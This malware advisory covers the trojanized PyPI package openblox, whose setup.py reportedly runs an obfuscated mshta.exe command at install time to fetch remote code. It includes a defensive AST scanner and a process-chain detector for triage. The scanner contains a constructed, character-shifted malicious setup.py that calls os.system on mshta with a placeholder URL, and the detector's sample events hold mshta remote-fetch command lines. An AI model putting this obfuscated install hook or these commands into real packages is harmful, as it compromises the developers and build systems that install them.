MAL-2026-6504: Malicious code in openblox (PyPI)
Description
The openblox PyPI package versions 1.0.0 and 1.0.1 contain malicious code that executes at install time. The setup.py script calls a function, unconditionally and at module level, that reassembles an obfuscated command and executes it; the command launches mshta.exe with a remote URL, so the Windows HTA host downloads and runs attacker-controlled code. The package masquerades as a Roblox-related library but contains unrelated code and obfuscated commands intended to evade static detection.
Affected software
- openblox (PyPI): versions 1.0.0 and 1.0.1
AI-Powered Analysis
Machine-generated threat intelligence
Technical Analysis
The openblox package on PyPI, in versions 1.0.0 and 1.0.1, ships a setup.py that calls a function unconditionally at module level. Because setup.py is executed whenever pip builds the source distribution (during metadata preparation and dependency resolution as well as the install itself), nothing from the package has to be imported for the payload to run. The function reconstructs obfuscated strings to form a command that invokes the Windows mshta.exe utility to fetch and execute a remote HTA/JScript payload from https://fixars.top. mshta.exe is a signed Microsoft binary that runs HTA content with the privileges of the calling user and without browser sandboxing, which is why it is a common living-off-the-land choice for remote staging. The obfuscation uses character arithmetic (shifting character codes and rebuilding the string at run time) so that neither the executable name nor the URL appears literally in the file, which defeats simple string matching. The package also uses misleading metadata and a Roblox-themed name to attract users looking for a legitimate Roblox library, effectively acting as a trojanized package. Two practical consequences follow. The second stage is fetched at install time, so what it does cannot be determined from the package contents alone and may have changed between victims. And on non-Windows hosts mshta.exe does not exist, so the command fails while the install otherwise succeeds, which can make the package look harmless in a Linux-based CI job or sandbox.
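How a reviewer can triage a setup.py like this one without running it, as an added example (not the page's analysis code and not the package's own code): a small AST-based scanner that lists the calls made at module level (the ones pip executes on every sdist build), locates shell and process sinks, and constant-folds chr/ord-arithmetic expressions inside a restricted evaluator to recover the hidden strings. The setup.py it scans is constructed for the demo, shifted by 3 like a Caesar cipher, with a placeholder URL under the reserved .invalid domain rather than the real one; the real package's obfuscation may differ in detail.

```python
import ast

# Constructed stand-in for a trojanized setup.py (NOT the real openblox file). It is only
# parsed, never executed: the two shifted literals decode to "mshta" and a placeholder URL.
SAMPLE_SETUP_PY = r'''
from setuptools import setup
import os

def _boot():
    exe = "".join(chr(ord(c) - 3) for c in "pvkwd")
    url = "".join(chr(ord(c) - 3) for c in "kwwsv=22h{dpsoh1lqydolg2s1kwd")
    os.system(exe + " " + url)

_boot()

setup(name="openblox", version="1.0.0", packages=["openblox"])
'''

# Calls that hand a string to a shell or spawn a process; any of these in setup.py deserves a look.
SHELL_SINKS = {
    "os.system", "os.popen", "os.startfile", "subprocess.run", "subprocess.Popen",
    "subprocess.call", "subprocess.check_call", "subprocess.check_output",
}

# Node types and callables permitted inside an expression we are willing to constant-fold.
_FOLD_NODES = (ast.Call, ast.Name, ast.Constant, ast.BinOp, ast.Add, ast.Sub,
               ast.GeneratorExp, ast.ListComp, ast.comprehension, ast.Attribute,
               ast.Load, ast.Store)
_FOLD_FUNCS = {"chr": chr, "ord": ord, "str": str, "int": int}


def dotted_name(node):
    """'os.system' for attribute chains, 'chr' for bare names, None for anything else."""
    if isinstance(node, ast.Name):
        return node.id
    if isinstance(node, ast.Attribute):
        base = dotted_name(node.value)
        return f"{base}.{node.attr}" if base else None
    return None


def fold_string_expr(node):
    """Evaluate an expression built only from chr/ord arithmetic, literals and ''.join.
    Returns the decoded str, or None if anything outside that whitelist appears."""
    loop_vars = set()
    for sub in ast.walk(node):
        if not isinstance(sub, _FOLD_NODES):
            return None
        if isinstance(sub, ast.comprehension):
            if sub.ifs or not isinstance(sub.target, ast.Name):
                return None
            loop_vars.add(sub.target.id)
        elif isinstance(sub, ast.Attribute):
            # only the method form ''.join / 'sep'.join on a string literal
            if sub.attr != "join" or not (isinstance(sub.value, ast.Constant)
                                          and isinstance(sub.value.value, str)):
                return None
    for sub in ast.walk(node):
        if isinstance(sub, ast.Name) and sub.id not in _FOLD_FUNCS and sub.id not in loop_vars:
            return None
    expr = ast.fix_missing_locations(ast.Expression(body=node))
    try:
        # chr/ord go into globals so nested comprehension scopes can see them; no builtins.
        value = eval(compile(expr, "<fold>", "eval"), {"__builtins__": {}, **_FOLD_FUNCS})
    except Exception:
        return None
    return value if isinstance(value, str) else None


def scan_setup_py(source):
    """Static triage of a setup.py: what runs at build time, what spawns processes, what is hidden."""
    tree = ast.parse(source)
    findings = {"import_time_calls": [], "shell_sinks": [], "decoded_strings": []}
    for stmt in tree.body:  # top level == runs on every sdist build / metadata preparation
        if isinstance(stmt, ast.Expr) and isinstance(stmt.value, ast.Call):
            name = dotted_name(stmt.value.func) or "<call>"
            if name != "setup":
                findings["import_time_calls"].append((name, stmt.lineno))
    for node in ast.walk(tree):
        if not isinstance(node, ast.Call):
            continue
        name = dotted_name(node.func)
        if name in SHELL_SINKS:
            findings["shell_sinks"].append((name, node.lineno))
        elif isinstance(node.func, ast.Attribute) and node.func.attr == "join":
            decoded = fold_string_expr(node)
            if decoded is not None:
                findings["decoded_strings"].append(decoded)
    return findings


def is_suspicious(findings):
    """Verdict: unconditional build-time code reaching a shell sink, or a decoded LOLBin name / URL."""
    hidden = any("mshta" in s.lower() or "://" in s for s in findings["decoded_strings"])
    return bool(findings["import_time_calls"] and findings["shell_sinks"]) or hidden


if __name__ == "__main__":
    result = scan_setup_py(SAMPLE_SETUP_PY)
    for key, values in result.items():
        print(f"{key}: {values}")
    print("suspicious:", is_suspicious(result))
```

The folding step is deliberately narrow: it refuses any name, attribute or node type outside the whitelist before anything is compiled, so a setup.py that wraps its decoder in a helper function or pulls from a file simply yields no decoded string and is flagged on the other two signals instead. Run it over the unpacked sdist rather than an installed site-packages tree, since the payload lives in setup.py, not in the package's modules.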
Potential Impact
Installing either affected version on a Windows machine leads to arbitrary code execution via mshta.exe running a remote script, with the privileges of the user or service account performing the installation. On a developer workstation that typically means access to source trees, SSH and cloud credentials and saved browser sessions; on a CI runner it means the build's secrets and whatever the runner can reach on the network. Because the payload is staged from an attacker-controlled server, a completed install should be treated as a full host compromise with possible further malware deployment, not as a single bad file to delete.
Mitigation Recommendations
Malicious packages are not patched; removal from the index is the usual outcome, and no remediation from the publisher is documented. Practical steps:
- Do not install openblox 1.0.0 or 1.0.1. Search lockfiles, requirements files and pip caches for the name and versions.
- Treat any Windows host that installed either version as compromised: collect the mshta.exe command line and its child processes from EDR or Sysmon telemetry, rotate credentials that were available to the installing user, and rebuild the host rather than just uninstalling the package.
- Where possible, prevent install-time code from running at all: install from wheels only (pip install --only-binary=:all:) and pin dependencies with hashes (--require-hashes), so an sdist's setup.py is never executed on your machines.
- Front PyPI with an internal proxy that enforces an allowlist or a quarantine period for newly published packages, and review a new dependency's setup.py and pyproject.toml before approving it.
- Add a detection for mshta.exe (and other script hosts such as wscript.exe, cscript.exe and powershell.exe) spawned beneath python.exe or pip.exe, especially with a URL on the command line; that process chain has no legitimate reason to occur during a package install.
- Watch PyPI and the OSV/GCVE records for removal of the package or updates to this entry.
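A detection for the process chain this package produces at install time, as an added example that is not taken from the page or from any product: os.system on Windows runs its command through cmd.exe, so the telemetry to look for is python.exe (or pip.exe) -> cmd.exe -> mshta.exe with a URL, or an inline javascript:/vbscript: handler, on the command line. The events below are constructed in a simplified JSON-lines shape with field names of my choosing; the PIDs, paths and example.invalid URLs are invented, and a real pipeline would map Sysmon Event ID 1 or EDR process-creation fields onto pid/ppid/image/cmdline.

```python
import json
import ntpath
import re

# Constructed process-creation events (not real telemetry). The 4100 -> 4188 -> 4210 -> 4222
# chain is the install-time dropper; 5000 is a benign local .hta; 5100 has a URL but no
# Python ancestor in the captured window, so it is not attributed to a package install.
SAMPLE_EVENTS = r"""
{"pid": 4100, "ppid": 900,  "image": "C:\\Python311\\python.exe", "cmdline": "python.exe -m pip install openblox"}
{"pid": 4188, "ppid": 4100, "image": "C:\\Python311\\python.exe", "cmdline": "python.exe setup.py bdist_wheel"}
{"pid": 4210, "ppid": 4188, "image": "C:\\Windows\\System32\\cmd.exe", "cmdline": "cmd.exe /c mshta https://example.invalid/p.hta"}
{"pid": 4222, "ppid": 4210, "image": "C:\\Windows\\System32\\mshta.exe", "cmdline": "mshta https://example.invalid/p.hta"}
{"pid": 5000, "ppid": 1200, "image": "C:\\Windows\\System32\\mshta.exe", "cmdline": "mshta.exe C:\\Vendor\\wizard.hta"}
{"pid": 5100, "ppid": 1200, "image": "C:\\Windows\\System32\\mshta.exe", "cmdline": "mshta https://intranet.example.invalid/portal.hta"}
"""

# Process images that indicate a Python package build or install is in progress.
PYTHON_INSTALLERS = {"python.exe", "pythonw.exe", "pip.exe", "pip3.exe"}

# mshta accepts a remote URL or an inline javascript:/vbscript: handler; a plain local .hta
# path is the usual benign case, so only these forms are treated as interesting.
REMOTE_OR_INLINE = re.compile(r"(https?://|javascript:|vbscript:)", re.IGNORECASE)


def parse_events(text):
    """One JSON object per non-empty line."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def detect_install_time_mshta(events, max_depth=8):
    """Return mshta.exe launches (with a URL or inline script) whose ancestry, walked
    through ppid up to max_depth levels, contains a Python interpreter or pip."""
    by_pid = {e["pid"]: e for e in events}
    hits = []
    for e in events:
        if ntpath.basename(e["image"]).lower() != "mshta.exe":
            continue
        if not REMOTE_OR_INLINE.search(e["cmdline"]):
            continue
        ancestry, cur = [], e
        for _ in range(max_depth):
            cur = by_pid.get(cur["ppid"])
            if cur is None:  # parent not in the captured window (or PID reuse); stop walking
                break
            ancestry.append(ntpath.basename(cur["image"]).lower())
        if any(name in PYTHON_INSTALLERS for name in ancestry):
            hits.append({
                "pid": e["pid"],
                "cmdline": e["cmdline"],
                "chain": ancestry[::-1] + ["mshta.exe"],  # root-first for readability
            })
    return hits


if __name__ == "__main__":
    for hit in detect_install_time_mshta(parse_events(SAMPLE_EVENTS)):
        print(f"pid {hit['pid']}: {' -> '.join(hit['chain'])}")
        print(f"  {hit['cmdline']}")
```

The ancestry walk is bounded and stops at the first parent missing from the event set, so a chain that started before collection began is simply not attributed rather than guessed at; in production, key the parent map on a process GUID rather than a bare PID to avoid PID-reuse false links. The same walk catches wscript.exe, cscript.exe or powershell.exe under a package install if those names are added to the image check.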
Technical Details
- GCVE source: db.gcve.eu
- OSV ID: MAL-2026-6504
- OSV schema version: 1.7.4
- Aliases: none
- Ecosystems: PyPI
- Database-specific severity: not assigned
- CVSS version: not assigned
Threat ID: 6a3ef7b127e9c79719ffb933
Added to database: 06/26/2026, 22:05:37 UTC
Last enriched: 06/26/2026, 22:30:27 UTC
Last updated: 06/26/2026, 22:30:27 UTC